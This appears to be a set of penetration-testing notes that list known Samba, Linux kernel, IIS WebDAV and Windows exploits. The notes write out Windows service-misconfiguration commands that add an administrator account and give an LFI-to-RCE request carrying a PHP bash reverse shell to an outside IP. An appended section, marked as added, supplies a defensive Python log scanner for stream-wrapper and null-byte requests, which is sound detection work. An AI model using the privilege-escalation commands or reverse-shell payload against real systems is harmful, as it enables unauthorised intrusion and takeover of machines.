Common Exploits
Samba trans2open Overflow (Linux x86) / 10.11.1.22
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8.
Dirty COW exploit
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
Linux Kernel 2.6.39 < 3.2.2 - 'Mempodipper' Local Privilege Escalation
WebDAV exploit
windows/iis/iis_webdav_upload_asp
linux/samba/trans2open (Samba 2.2.x) - exploitdb-link Samba < 2.2.8
Exploit to use against the Samba service
Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046); works on Windows 7 / Windows Server 2008 and earlier operating systems. - afd.sys Privilege Escalation (MS14-040), PoC
accesschk.exe
# sc config upnphost binpath= "net eviluser testxlab Password1 /add"
# sc config upnphost binpath= "net localgroup Administrators eviluser /add"
# sc stop upnphost
# sc start upnphost
To view the service's configuration settings
# sc qc upnphost
Checking service permissions
# accesschk-xp.exe -uwcqv "Authenticated Users" * /accepteula
usage to be written
Notes
On systems such as Windows XP, XP SP1 and SP2, you can escalate privileges through the upnphost service.
LFI to RCE
POST /section.php?page=php://input%00
[HTTP POST DATA]
<?php echo shell_exec("bash -i >& /dev/tcp/10.11.0.94/443 0>&1 2>&1"); ?>
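A defender's view of the request above, as an added example that is not part of the original notes: a Python check that flags PHP stream wrappers and null bytes in the query parameters of access-log lines. It goes beyond php://input to the other common wrappers; the sample log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# PHP stream wrappers that should never appear in an include parameter.
WRAPPERS = ("php://", "data:", "expect://", "phar://", "zip://")
# Request field of a common/combined-format access-log line.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%2500) is seen in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect(line):
    """Return (parameter, reason) findings for one access-log line."""
    match = REQUEST.search(line)
    if not match:
        return []
    findings = []
    _, _, query = match.group("target").partition("?")
    for pair in filter(None, query.split("&")):
        name, _, raw = pair.partition("=")
        value = decode(raw).lower()
        for wrapper in WRAPPERS:
            if value.startswith(wrapper):
                findings.append((name, "stream wrapper " + wrapper))
        if "\x00" in value:
            findings.append((name, "null byte"))
    return findings

# Constructed sample lines (documentation addresses), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /section.php?page=about HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "POST /section.php?page=php://input%00 HTTP/1.1" 200 87',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /section.php?page=PHP%253A%252F%252Ffilter/resource=index HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        for name, reason in inspect(entry):
            print(f"{reason} in parameter '{name}': {entry}")
```

The POST body is not written to a standard access log, so the query string is the only trace of this request there. The durable fix is to map the `page` parameter to an allow-list of file names and keep `allow_url_include` off.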
MS11-080